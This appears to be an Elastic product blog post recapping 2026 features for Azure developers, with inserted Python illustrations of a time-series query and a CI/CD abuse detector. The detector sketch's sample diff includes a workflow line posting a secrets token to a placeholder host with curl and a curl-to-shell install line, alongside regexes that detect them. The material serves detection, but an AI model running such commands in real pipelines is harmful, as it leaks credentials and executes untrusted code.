The essential Elastic 2026 wrap-up for Microsoft Build attendees and Azure developers

AI agents that remember. 30x faster than Prometheus. One index for all media. Here’s what Elastic shipped in 2026.

So far in 2026, Elastic has shipped four advances that change what your search and AI stack can do.

  • Elastic Inference Service (EIS) now hosts jina-embeddings-v5-omni, which puts text, images, video, and audio in a single Elasticsearch index across nearly 100 languages. 
  • Elastic Agent Builder shipped context management, skills, and enterprise connectors so that AI agents stay accurate across long conversations at scale. 
  • The rebuilt metrics engine stores OpenTelemetry (OTel) data at 3.75 bytes per data point and queries it 160x faster than earlier Elasticsearch TSDS.
  • Elastic Security Labs open-sourced a CI/CD pipeline detector that catches GitHub Actions and Azure DevOps attackers before they reach production.

Catch up with what we’ve shipped in 2026 in this blog.

4 reasons Elastic is the platform for Azure developers in 2026

1. Elasticsearch is now the retrieval layer for agents built on Azure AI Foundry

The single biggest production failure for AI agents is context — wrong data, stale data, or no data at all reaching the agent at inference time. Elastic 9.4 solves this with three production-grade advances to Agent Builder, now generally available:

  1. Skills: Instructional packages are loaded by the agent on demand, giving it domain expertise without bloating every context window. Five purpose-built skills have shipped for security operations, five have shipped for site reliability engineering (SRE) workflows, and more are in development. 

  2. Native Microsoft 365 connectors: SharePoint and Drive content surfaces directly into agent context through a semantic metadata layer. Your enterprise corpus becomes the retrieval backbone; Elasticsearch is the index.

  3. Context management at scale: Query result offloading, compaction, and summarization keep long, multi-turn agent conversations accurate and cost-efficient in production.

GPU-accelerated indexing via NVIDIA cuVS — generally available in Elastic 9.4 — delivers a 12x improvement in indexing throughput. DiskBBQ, Elastic's vector indexing algorithm, has improved query latency by at least 3x for queries with restrictive filters. For AI workloads running on Azure with high-cardinality embeddings, this is the infrastructure advantage that shows up in latency and cost at scale.

The Microsoft Azure AI integration is a first-class citizen in the Elasticsearch Labs ecosystem. If you are using Azure OpenAI Service or Azure AI Foundry models, Elasticsearch is ready as the retrieval backbone with hybrid search (BM25 + vector), reranking, and context engineering built in.

For TypeScript and JavaScript developers in the Azure ecosystem, Elastic also shipped a fluent, type-safe Elasticsearch Query Language (ES|QL) query builder in April 2026. No more raw string interpolation for queries. No more runtime surprises from typos in field names:

const query = esql
  .from('logs-*')
  .where('event.category', '==', 'authentication')
  .stats('count(*)', { by: ['user.name', 'host.name'] })
  .sort('count(*)', 'desc')
  .limit(10);

One index for every media type your agent touches

Microsoft 365 content is not only text. SharePoint libraries hold PDFs, slide decks, and scanned images. Teams capture meeting recordings. Azure Blob Storage holds product photography, training videos, and audio files from customer calls. Until now, indexing each type required a separate model and a separate pipeline.

jina-embeddings-v5-omni is hosted on Elastic Inference Service and puts text, images, video, and audio in a single Elasticsearch index. One query retrieves semantically relevant content across every media type simultaneously, covering nearly 100 languages. The model is available in two sizes, small and nano; both are optimized for standard GPU hardware.

For developers with existing text indices, jina-embeddings-v5-omni generates text embeddings identical to jina-embeddings-v5-text. You can extend a text index to handle images, audio, and video without rebuilding it. With Elasticsearch BBQ quantization enabled, the model loses less than 3% performance while storing embeddings in 93% less space.

Note: jina-embeddings-v5-omni is available for non-commercial evaluation under a CC-BY-NC-4.0 license. Contact Elastic Sales for commercial deployment.

2. Elastic is now inside VS Code, Cursor, and GitHub Copilot

In April 2026, Elastic shipped MCP Apps — interactive UIs rendered inside an AI conversation and built on the MCP App standard, coauthored by Anthropic and OpenAI. Three MCP Apps launched simultaneously: security, observability, and search. All three work natively inside VS Code Copilot, Cursor, and Claude Desktop.

The Elastic Security MCP App delivers six interactive security operations center (SOC) dashboards rendered inline in the chat without leaving the coding environment:

  1. Alert triage: Fetch, filter, and classify security alerts. Severity grouping, AI verdict cards, process tree, and network events.

  2. Attack Discovery: AI-correlated attack chain analysis with on-demand generation. Attack narrative cards with confidence scoring, entity risk, and MITRE mapping.

  3. Case management: Create, search, and manage investigation cases. Case list with alerts, observables, comments tabs, and AI actions.

  4. Detection rules: Browse, tune, and manage detection rules. Rule browser with KQL search, query validation, and noisy-rule analysis.

  5. Threat hunt: ES|QL workbench with entity investigation. Query editor, clickable entities, and investigation graph.

  6. Sample data: Generate ECS security events for common attack scenarios. Scenario picker with four prebuilt attack chains.

Every action writes back to Elasticsearch and Kibana through the same APIs the product uses. Role-based access controls are enforced through the existing Elasticsearch API key. Setup is a single .mcpb bundle double-click. No new infrastructure. No new governance model.

The Kubernetes Observability MCP App brings AKS investigation skills directly into VS Code. When a pod crashes, the AI coding agent can query root cause, surface structured evidence, and recommend next steps without opening a dashboard.

Install both bundles from the latest GitHub release.

3. Elasticsearch is now a production-grade columnar metrics engine

Azure is all-in on OpenTelemetry. Azure Monitor, AKS, Azure Functions, and Azure AI Foundry all emit OpenTelemetry protocol (OTLP) data natively. If you are already collecting OTel telemetry from your Azure workloads, the question is where it lands and how fast you can query it when something breaks at 2:00 a.m.

Elastic rebuilt Elasticsearch's metrics engine from the ground up in 2026, and the results are significant. The new columnar metrics engine stores OTel metrics at 3.75 bytes per data point — down from 25 bytes a year ago, a 6.6x improvement in storage efficiency. Query performance improved by up to 160x compared to earlier versions of Elasticsearch TSDS. Indexing throughput for OTel data improved by up to 50%.

The architectural work behind these numbers involved three layers:

  1. Fully columnar storage: Elastic replaced inverted indices and BKD trees on dimension fields with doc value skippers, a Lucene-native structure that amplifies the columnar layout and eliminates duplicate index overhead. Each field is stored in its own file. No row-level tracking. No storage bloat.

  2. Vectorized ES|QL compute engine: The new TS source command, generally available in Elastic 9.4, executes time series aggregations using a two-level model: an inner aggregation per time series, such as RATE() or AVG_OVER_TIME(), and then an outer aggregation over the results. The compute engine processes data in time series sort order with zero-copy decoding directly into the primitive arrays it operates on. Counter rate, gauge average, and windowed queries all run with parallel vectorized execution.

  3. Native OTLP ingestion: A dedicated OTLP protobuf endpoint, generally available in Elastic 9.3, accepts data directly from OpenTelemetry collectors with no JSON translation layer. Hashing over dimensions for time series ID calculations is amortized across data points in a single protobuf message, reducing indexing overhead by 20%.

For Azure AKS teams with existing PromQL-based dashboards and alert rules, Elastic 9.4 ships native PromQL support (technical preview) in Kibana. Existing queries work without modification. The same TSDS storage and vectorized compute engine power both PromQL and ES|QL queries side by side.

The result is a single platform for logs, metrics, traces, and security data with no separate backends to operate, no cardinality limits, and no per-metric pricing. For Azure developers who are already emitting OTel data, landing it in Elasticsearch costs less to store and queries faster than running a dedicated metrics stack alongside your existing log infrastructure.

A sample ES|QL time series query for Azure AKS workloads:

TS metrics-hostmetricsreceiver.otel-default
| WHERE TRANGE(4h)
| STATS AVG(RATE(system.cpu.time)) BY host.name, TBUCKET(5m)
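
The two-level model behind the query above, as an added Python illustration (not Elastic's code): an inner per-series rate with counter-reset handling, then an outer average by host and bucket. It is a simplified model of what AVG(RATE(...)) BY host.name, TBUCKET(5m) computes; the sample data, the `cpu` dimension and the function names are constructed assumptions.

```python
from collections import defaultdict

def counter_rate(points):
    # Inner level: per-second rate of ONE counter series. A drop in value is
    # treated as a counter reset, so the post-reset value is the increase.
    # Simplified model: no extrapolation to the bucket edges.
    points = sorted(points)
    increase = sum(cur - prev if cur >= prev else cur
                   for (_, prev), (_, cur) in zip(points, points[1:]))
    return increase / (points[-1][0] - points[0][0])

def avg_rate_by(samples, group_key, bucket_s=300):
    # Group samples into (time series, bucket); a series is identified by
    # the full set of its dimensions, not just the grouping key.
    series = defaultdict(list)
    for s in samples:
        tsid = tuple(sorted(s["dims"].items()))
        series[(tsid, s["ts"] - s["ts"] % bucket_s)].append((s["ts"], s["value"]))
    # Outer level: average the per-series rates by one dimension and bucket.
    groups = defaultdict(list)
    for (tsid, bucket), pts in series.items():
        if len({t for t, _ in pts}) >= 2:  # a rate needs two distinct timestamps
            groups[(dict(tsid)[group_key], bucket)].append(counter_rate(pts))
    return {key: sum(r) / len(r) for key, r in groups.items()}

# Constructed samples: two CPU series on one host; cpu1's counter resets at t=120.
SAMPLES = [
    {"ts": t, "dims": {"host.name": "aks-node-1", "cpu": cpu}, "value": v}
    for cpu, pts in {"cpu0": [(0, 100), (60, 160), (120, 220)],
                     "cpu1": [(0, 500), (60, 560), (120, 30)]}.items()
    for t, v in pts
]
```

Averaging the raw counter values across cpu0 and cpu1 would mix two unrelated counters and turn the reset into a large negative step; computing the rate per series first avoids both.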

4. Elastic now secures the apps you build, including the pipeline that deploys them

CI/CD pipelines are a top attack target in 2026, and these attacks target Azure and GitHub developers directly.

Elastic Security Labs published research in April 2026 on a pattern that played out across the industry: Attackers stopped going after production servers and started targeting the automation that deploys to them. In September 2025, the GhostAction campaign stole 3,325 secrets from 817 GitHub repositories by injecting malicious workflow files. In February 2026, HackerBot-Claw compromised Aqua Security's Trivy repository, exposing 33,000 secrets across 7,000 machines via a GitHub Actions misconfiguration that Microsoft's own security team subsequently documented.

Elastic Security Labs open-sourced cicd-abuse-detector — a drop-in CI template using 50+ signal extraction patterns plus large language model (LLM) reasoning to detect suspicious changes to GitHub Actions, GitLab CI, and Azure DevOps pipelines. It runs on a standard ubuntu-latest runner with no Python dependencies. Verdicts ship to Elasticsearch for cross-platform correlation:

FROM logs-cicd.abuse-*
| WHERE verdict.verdict IN ("malicious", "suspicious") AND @timestamp > NOW() - 7 days
| EVAL platform = cicd.platform, repo = cicd.repository, actor = cicd.actor
| SORT @timestamp DESC

One query. Every platform. Historically queryable.
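
How regex signal extraction over a pipeline change can feed a verdict document, as an added Python sketch; it is not code from cicd-abuse-detector and omits the LLM reasoning step. The signal names, patterns, weights, thresholds, platform labels and sample diff are constructed assumptions; the output reuses the field names from the query above.

```python
import re

# Hypothetical signals (name, weight, regex); not cicd-abuse-detector's own patterns.
SIGNALS = [
    ("pull_request_target_trigger", 2, re.compile(r"\bpull_request_target\b")),
    ("secret_with_network_tool", 3, re.compile(r"\b(curl|wget)\b.*\$\{\{\s*secrets\.")),
    ("pipe_to_shell", 3, re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")),
    ("unpinned_action", 1, re.compile(r"uses:\s*[\w.-]+/[\w./-]+@(?![0-9a-f]{40}\b)\S+")),
]
# Pipeline definition files per platform; the platform labels are assumed values.
PLATFORMS = {"github_actions": re.compile(r"^\.github/workflows/.+\.ya?ml$"),
             "gitlab_ci": re.compile(r"^\.gitlab-ci\.ya?ml$"),
             "azure_devops": re.compile(r"^azure-pipelines\.ya?ml$")}

def extract_signals(diff_text):
    # Only added lines in pipeline files count; removals and other files are skipped.
    hits, platform = [], None
    for line in diff_text.splitlines():
        if line.startswith("+++ "):
            path = line[6:] if line.startswith("+++ b/") else ""
            platform = next((p for p, rx in PLATFORMS.items() if rx.search(path)), None)
        elif platform and line.startswith("+"):
            hits += [(platform, n, w) for n, w, rx in SIGNALS if rx.search(line[1:])]
    return hits

def build_verdict(diff_text, repository, actor, timestamp):
    # Each distinct signal scores once; the thresholds 2 and 5 are arbitrary.
    hits = extract_signals(diff_text)
    distinct = {name: weight for _, name, weight in hits}
    score = sum(distinct.values())
    verdict = "malicious" if score >= 5 else "suspicious" if score >= 2 else "benign"
    cicd = {"platform": hits[0][0] if hits else None, "repository": repository, "actor": actor}
    return {"@timestamp": timestamp, "cicd": cicd,
            "verdict": {"verdict": verdict, "score": score, "signals": sorted(distinct)}}

# Constructed sample (git diff -U0 style): a workflow change plus a README change.
SAMPLE_DIFF = """\
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -1 +1 @@
-on: pull_request
+on: pull_request_target
@@ -9,0 +10,2 @@
+      - uses: actions/checkout@v4
+      - run: curl -d "${{ secrets.DEPLOY_TOKEN }}" https://collector.example.invalid
--- a/README.md
+++ b/README.md
@@ -3,0 +4 @@
+Install: curl https://example.invalid/install.sh | sh
"""
```

The README line matches the pipe-to-shell pattern but is not scored, because only changes to pipeline definition files are in scope.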

For Entra ID and Active Directory environments, Elastic Security 9.4 ships four new Entity Analytics capabilities that resolve identity noise at the data model level:

  1. Entity resolution: Unifies Okta, Microsoft Entra ID, and Active Directory into one verified identity record per employee. When a threat actor moves laterally using the same identity across three systems, Elastic sees it as one entity, not three separate alerts.

  2. Dynamic watchlists: Injects risk multipliers for Azure privileged admins, executives, and crown-jewel service accounts

  3. Entity-driven hunting leads: Surfaces proactive, environment-specific threat hunting leads rather than a blank hunt query

  4. Precision entity identification: Governs identity unification automatically at the platform level

For Azure AI Foundry and LLM applications, the Azure AI Foundry integration, shipped in Elastic 9.1, centralizes observability by pulling logs and metrics from any AI model hosted on Azure AI Foundry into Elasticsearch automatically. From there, Elastic Observability delivers full distributed tracing across agent chains, token cost tracking, latency monitoring, and safety evaluation, so you can see exactly what your agent did, what it cost, and where it broke.

For GitHub Actions and Azure DevOps users managing Kibana, Elastic 9.4 ships Dashboards as Code — version-controlled Kibana dashboards deployed through CI/CD pipelines. Dashboards live in source control alongside your application code. Pull requests, review gates, and automated rollouts apply to your observability and security views the same way they apply to the services those views monitor.

Compliance: FIPS 140-3 compliance for Elasticsearch and Kibana is generally available in Elastic 9.4, ahead of the September 2026 deadline. Elastic Cloud Serverless is live in nine Azure regions worldwide and will continue Azure regional expansion in the coming months.

Start here: 4 actions for Microsoft Build attendees

  1. Wire Elasticsearch into your Azure AI Foundry agent today. Start a free Elastic Cloud trial. Navigate to the Microsoft Azure AI integration. Connect your first Azure OpenAI-backed agent to Elasticsearch as the retrieval layer. A working prototype takes under an hour.
  2. Install the Elastic MCP Apps in VS Code. Download the .mcpb bundle from the latest release. Connect it in VS Code Copilot using your Elasticsearch URL and API key. Your first security triage or Kubernetes investigation runs inside the chat in five minutes.
  3. Land your Azure OTel metrics in Elasticsearch. Enable the managed OTLP endpoint on Elastic Cloud. Point your Azure Monitor OTel collector at it. Query your AKS metrics, host telemetry, and application traces in a single ES|QL pipeline — no separate metrics backend required.
  4. Harden your GitHub Actions and Azure DevOps pipelines. Clone the cicd-abuse-detector repo. Add it to your next pull request check. Review the full threat model against your pipeline configuration. The entire setup runs on your existing runner with no dependencies beyond the Claude Code CLI.

The Elasticsearch Platform in 2026 was built for developers who work in the Microsoft and Azure ecosystem. Agents, metrics, pipelines, and identity all converge here. Build with us.

The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.